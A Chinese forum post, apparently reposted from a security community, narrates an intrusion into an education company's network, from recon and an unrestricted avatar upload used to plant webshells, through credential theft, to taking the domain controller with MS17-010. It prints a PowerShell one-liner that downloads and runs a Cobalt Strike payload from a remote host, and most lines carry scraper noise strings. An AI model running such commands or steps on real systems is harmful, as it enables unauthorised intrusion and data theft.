|
9 |; k$ O6 r8 E# b
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路; C* d y. [( G1 \( x
4 ] K, }4 w( F( {! K& K
2 j/ j& H- j$ Z' S. N2 P8 u9 x
# B$ O7 O6 |" }$ ^ ) d9 Q5 B t0 ^% b8 Y" K6 h5 m& p! g' p
1 y& t0 k6 q8 C$ a; o- ` 正文. r) e% y+ z& ?) S S
# i$ b5 U' Q6 E' f( O2 R
$ r* t- d- y- M( a. j4 g8 k ! n5 |# s2 P8 `. a
' X1 z8 R3 ]( u9 {. O6 T$ B8 x4 A/ _8 x0 T
目标:www.xxxx.com(一家教育机构)
4 i" @8 I/ [# c8 L9 O5 g3 f
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能1 t6 ^5 j0 [0 f
' s4 N, b# |$ i4 [& M
Q7 ` u1 [0 I) f0 t0 k. |  " f1 k* j" B' W
6 V" c9 P9 s0 N& a* D$ y7 K
7 C# G {' e1 U- Y2 ?, o 进行了简单的信息搜集
' D0 o! K! J C/ h% D
& y* I$ I( }2 u% X
2 x! Z v# m: U
8 I! d: g1 U) h3 N f3 `4 x. M( T) A' s5 | e7 e0 p; @& R
子域名搜集5 ~9 H2 e. m) e
- C2 h- {* {. y) G
& T' I. D f o& s6 o, ] 
- K# a: r; h$ n, D4 a% B& r" T5 M
( J8 p9 f& U+ x3 O8 n9 D' Q* ]; d' j# u
fofa找资产
& [! S9 o( g0 Q" P7 B
$ W" T H" o( {* f# k
- T- P3 |* I3 X' L: V/ U
0 U1 z- P! F2 _+ N8 i# ?( t3 h5 |$ N9 s" n7 e
 7 F: H2 n& O! |
1 R; Y# Q7 c4 d7 m/ @ c% W
" D' Z" L! t M$ { 一共七个资产。去重之后只有两个。
- K3 }- W& A& p
6 j4 x p7 {/ y, x0 K5 _' r' ^6 n& J0 y# B7 {" B i* Q
5 z1 \# R: R3 G& t& {" v) r- c
$ v2 X9 Y8 g( }. [: N; O 目录探测2 x C& I, R3 n4 V
6 [3 n' N1 t1 K3 U0 G' V. y. [0 g
: k( W6 j- D! b8 I* H/ y2 H+ R0 k% _2 _
" W" ]* |, S5 i) D1 Q' K) P % A* b6 v4 [8 F* ^( d2 y
, Q/ D6 r/ |, }% W; y' z2 c! ^& s
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
: S1 q( Y5 P; ~) K. ~; H
; q9 o8 V4 L6 `
$ ^9 b2 X% |! T( n$ A 2 C/ m. b: s- `; G- h
! D! W( R# r% w0 D
我又尝试了通过修改返回包来绕过登录界面! K; M1 v1 W2 P( m+ n
/ M S/ a2 m+ o+ q
/ Q% ]4 L+ ]) F& t0 e/ k  " n# @9 ]# j: ~
- I% N+ v2 I) W' m" W/ x
% c/ J( X+ |# f8 _7 Q) R 还是不行,尝试注入无果
) w: `2 ` U7 L8 Q! Z# `; k% y
& ^9 i2 ], v4 Y; l5 [% D) M E0 m" O4 A5 p$ X1 I% k
 $ Q. m: L2 M$ I- S+ Y# a' t
2 O$ w+ Q* m% c. O/ m1 a( ?0 u0 r7 _$ @
不过我目录探测出了一处Spring信息泄露
- ?* W7 t( m& |: A
5 v+ O0 g) m3 Z0 o. e/ q
& R! T2 v9 I \# f% v5 Y" u
- F! v+ G% m/ [: l0 w
T; k1 ]+ E, p1 w# C+ y
 % C8 k5 d) c# @4 v% _
- H+ _# e& }+ d4 O5 h
: |0 h3 @' ^/ t& [; j 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录8 E) r7 l5 A0 O; z
5 R( n7 K$ _$ n3 O. W5 a: z. D6 H2 Q6 x; ]# A3 b, K1 x5 ~+ ?9 e
 & k ?+ w7 B" K0 M& \0 b& w5 h
3 i) B$ B& b3 A
i' C2 [% N/ ?! z 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。: Q* p4 E* _5 p3 C
; K1 A, ]. H: }/ f, l0 Q- T
n c6 m' p$ k) F0 b2 J! ~9 x 
' x% Q. G% \3 t & w/ ?7 r1 a n+ f% s/ c
5 k) I+ H% `6 c1 j1 m4 a7 ^ 获取有些师傅到这一步就手机抓包电脑测了。
* [- o( T$ d* X: {# [ 5 }8 O3 {9 D& R* o- \' N! e
% ?8 }% w5 Q" N# D Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
, F/ q7 z" \+ ]; r0 ]/ |7 w8 Q8 }1 }
; r. g: k3 m0 R5 x$ ]1 f
3 e- H9 n0 u( y. `! [ 其中在一个公众号发现了小程序,可以进行注册。
?" i* \- N9 Y- _0 ]5 Y% l6 {7 G$ B
! T( y. R' A1 l' Z3 \+ u1 n5 }/ j1 d" Q4 Z. P- ^$ _2 [7 M
看到了头像上传,尝试上传获取WebShell4 f: _. X- b2 s7 {/ z
9 t$ i% a" v5 B* h% g9 g
7 A/ [5 o. x( ? 
: q# a! Q& ^( D$ g# e
2 i" Q: r8 q) \. O! b9 i4 x
" F" K/ Q! u! z+ n, F9 E: {. D, U 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
& u* j+ ~5 u" I& L! c. A; i u
i9 H- Y3 O4 G3 a1 _ v5 m% z$ T w! j& C
/ ?7 N8 V) q" A3 M( Z
# n; p; a+ e+ K ~; n9 E5 u; z* [, F3 c1 ^& ]' W% C* ~
然后上了大马5 ^% i0 C! } u# s8 p
4 C2 l+ R+ |5 o6 X
4 F6 G, ?+ x, @% x
 , F5 ^, Q2 L) w( K, u s
& i& ^" z6 _" P: I
6 S) u/ I: H2 r1 p( m 
8 I! g0 }5 I! `& c$ H; h; S ( q* d, w4 G8 _
4 f- o$ J1 x5 l c9 v6 n, u% N$ l 通过翻找文件发现数据库账号密码8 X3 P1 I- t. p; [* ?) m
- R6 | r$ F3 m3 p: j1 Q% I
( E/ e- p3 Y: C1 v4 m
 2 t4 Q, ?0 Y" L0 y* h2 {
0 r: k. l' e0 o0 x I- \2 A% R R& k0 z$ A- d Q
--内网渗透
, L/ g$ F Z* ^* x% \* J, W 9 E5 o: \2 i$ n. U
* c- N) D. u, ` 直接通过powershell执行 cs上线
3 d6 q+ {4 s8 z5 x) ~& n. j/ z
, Z; N8 k6 P& O
|: K1 K$ ? G( r powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"- D# I! ` _1 Z6 m' n; N
+ U* C1 U$ S% j9 m# D
) i( E3 @& ^; R9 w- q
 . e; \3 X2 z$ ]/ c
5 b( }+ w% e0 G0 g3 I! |
! H+ U# V. |/ L1 f& T* W6 H5 V 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
9 t) p7 U6 T a1 ` 5 i1 C$ ]8 ]; J# P9 s; [& I
9 Z) Z) B/ x1 ^$ x4 ^( L  . H5 L2 D4 R: U! z0 `
4 R: M$ Q/ L8 |! c3 Z; c4 O' O4 C1 ]4 Z u* ~8 s! [ d: c$ {' y/ K
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
0 @" J$ W5 o+ v) n1 p7 p, K9 j
. q4 t; n# _1 _" s, N0 Q
* [, r0 o3 Q9 O
* r5 T `+ M, g3 u
6 c8 f" l$ v3 o; q+ b/ N' _) e9 l) w' S/ y
7 O( |6 ~: E. ]9 z+ n6 m 9 c, v% C3 e: w) T/ V. I6 v
& W: R% ^9 U$ e# K# ]( \" O- F
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
c. X. l! g$ ~4 v* z* a& W
$ S& a7 t! {$ N- T/ W! F
6 f% a6 ]7 B+ o# y
; M$ ]: O3 C: V6 g
9 y+ Z; |3 u# ?3 Z, @
 3 X0 r! m, u% g+ W* p) l# {1 I
: z' S9 ?3 Z: E4 H6 p3 A( w
) e* R$ y; i) @+ _( Y' H0 M
! X! ]; x3 W* V/ I8 Z' L, |" a
7 z0 |* ]3 Z( X% t: ~$ @
8 _, ]5 T% z& S* R+ ~- D
7 O2 n6 o+ y! S: P# U8 T/ h$ p7 H9 }$ {. \1 @" W
. @1 q2 K& I2 I! ~8 b
1 U2 h1 c0 W+ O
( g& I& j1 Z5 Y, _& V 小结3 {: g% U0 I6 g7 B% ]$ h+ c/ S
6 z" Q. x! J+ `; R. v9 J$ E, ~$ r& h4 K6 h
" H( M: z7 V. L
5 r8 z, @0 B/ J8 `" e4 ?$ {
- l5 z+ ]3 L; K, V% l
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
2 G# l1 ?( X+ u& V. l8 ~3 h) _ 0 F/ X" {! c4 u9 a4 k& i# [
6 J' q* j% i4 j ~5 v& U
- W) x8 D* N# f/ s
0 b Q4 W' Y" N( z; I# z/ k" p
4 U; ~0 h* Z5 `7 a$ o
- ; w/ O9 V+ T0 B6 ?* O3 X/ [
* O) L/ F/ K9 Q9 Y6 x$ G$ H
8 ]( X6 O4 t1 s/ ^ - ) U0 Q& i4 N7 `% r( C
; G* t! |; B" N/ d8 [" y
& Y& D' e5 z; ?: k5 D
! b5 B, |. }* _* W8 Z+ Z8 e) @9 V& Q* N! R5 S" t
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
/ U7 B0 s# O7 ^9 Y0 w8 `# E
1 ~; N* U& L0 X# |" |& B
; C9 ]& t( I2 V 1 f# d- h) `$ }/ V# c
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对